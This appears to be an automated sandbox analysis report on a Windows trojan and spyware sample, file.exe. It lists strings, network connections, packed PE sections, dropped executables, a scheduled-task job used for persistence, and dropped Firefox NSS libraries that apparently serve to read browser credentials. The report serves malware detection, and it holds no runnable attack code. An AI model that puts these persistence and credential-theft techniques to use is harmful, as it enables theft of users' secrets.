Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_stick_around_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_stick_around_dark_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_account_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_account_darkmode_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_privacy_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_privacy_darkmode_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_created.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_double_device.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_double_device_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_full_house.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_link_accounts_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_link_accounts_darkmode_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_app_decision.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_app_decision_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_supervision_1.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_supervision_darkmode_1.svg
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountF
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountK%DYW
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounts$
Source: chromecache_132.17.dr String found in binary or memory: https://www.youtube.com/t/terms?chromeless=1&hl=
Source: chromecache_132.17.dr String found in binary or memory: https://youtube.com/t/terms?gl=
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: 06f6d9547f.exe, 0000000F.00000003.3010093216.00000000014D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES memstr_4ec2d118-a

System Summary

Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_75d7abe5-8
Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a650108a-f
Source: 06f6d9547f.exe.13.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_285953fa-0
Source: 06f6d9547f.exe.13.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_48c2599e-7
Source: random[1].exe0.13.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f7296e6e-0
Source: random[1].exe0.13.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_127521d2-8
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .idata
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5BB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5BB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5BB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C55F280
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 0_2_6C5535A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C545C 0_2_6C5C545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C565440 0_2_6C565440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595C10 0_2_6C595C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2C10 0_2_6C5A2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CAC00 0_2_6C5CAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C542B 0_2_6C5C542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D4D0 0_2_6C57D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5664C0 0_2_6C5664C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596CF0 0_2_6C596CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55D4E0 0_2_6C55D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 0_2_6C566C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B34A0 0_2_6C5B34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC4A0 0_2_6C5BC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57ED10 0_2_6C57ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C580512 0_2_6C580512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FD00 0_2_6C56FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C590DD0 0_2_6C590DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B85F0 0_2_6C5B85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C579E50 0_2_6C579E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C593E50 0_2_6C593E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2E4E 0_2_6C5A2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C574640 0_2_6C574640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C670 0_2_6C55C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6E63 0_2_6C5C6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597E10 0_2_6C597E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5600 0_2_6C5A5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9E30 0_2_6C5B9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55BEF0 0_2_6C55BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FEF0 0_2_6C56FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C76E3 0_2_6C5C76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C575E90 0_2_6C575E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BE680 0_2_6C5BE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4EA0 0_2_6C5B4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597710 0_2_6C597710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569F00 0_2_6C569F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C586FF0 0_2_6C586FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55DFE0 0_2_6C55DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A77A0 0_2_6C5A77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C578850 0_2_6C578850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D850 0_2_6C57D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59F070 0_2_6C59F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C567810 0_2_6C567810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59B820 0_2_6C59B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A4820 0_2_6C5A4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C50C7 0_2_6C5C50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57C0E0 0_2_6C57C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5958E0 0_2_6C5958E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5860A0 0_2_6C5860A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57A940 0_2_6C57A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AB970 0_2_6C5AB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CB170 0_2_6C5CB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56D960 0_2_6C56D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595190 0_2_6C595190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B2990 0_2_6C5B2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D9B0 0_2_6C58D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C9A0 0_2_6C55C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C599A60 0_2_6C599A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C598AC0 0_2_6C598AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C571AF0 0_2_6C571AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59E2F0 0_2_6C59E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CBA90 0_2_6C5CBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56CAB0 0_2_6C56CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C2AB0 0_2_6C5C2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5522A0 0_2_6C5522A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C584AA0 0_2_6C584AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C555340 0_2_6C555340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C370 0_2_6C56C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59D320 0_2_6C59D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C53C8 0_2_6C5C53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F380 0_2_6C55F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0064E410 13_2_0064E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00683048 13_2_00683048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00644CD0 13_2_00644CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00677D63 13_2_00677D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0068763B 13_2_0068763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00686EE9 13_2_00686EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00644AD0 13_2_00644AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0068775B 13_2_0068775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00688700 13_2_00688700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00682BB0 13_2_00682BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50000 14_2_7ED50000
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED5080C 14_2_7ED5080C
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C58CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5994D0 appears 90 times
Source: file.exe, 00000000.00000002.2450878675.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm vs file.exe
Source: file.exe, 00000000.00000002.2482389473.000000006C5E2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2482675409.000000006C7D5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000003.2449039751.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: file.exe Static PE information: Section: ZLIB complexity 0.9920654296875
Source: file.exe Static PE information: Section: ZLIB complexity 0.9898681640625
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: amadka[1].exe.0.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: CFBAKEHIEB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: CFBAKEHIEB.exe.0.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: explorti.exe.7.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: explorti.exe.7.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9920654296875
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9920654296875
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@50/68@8/8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5B7030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
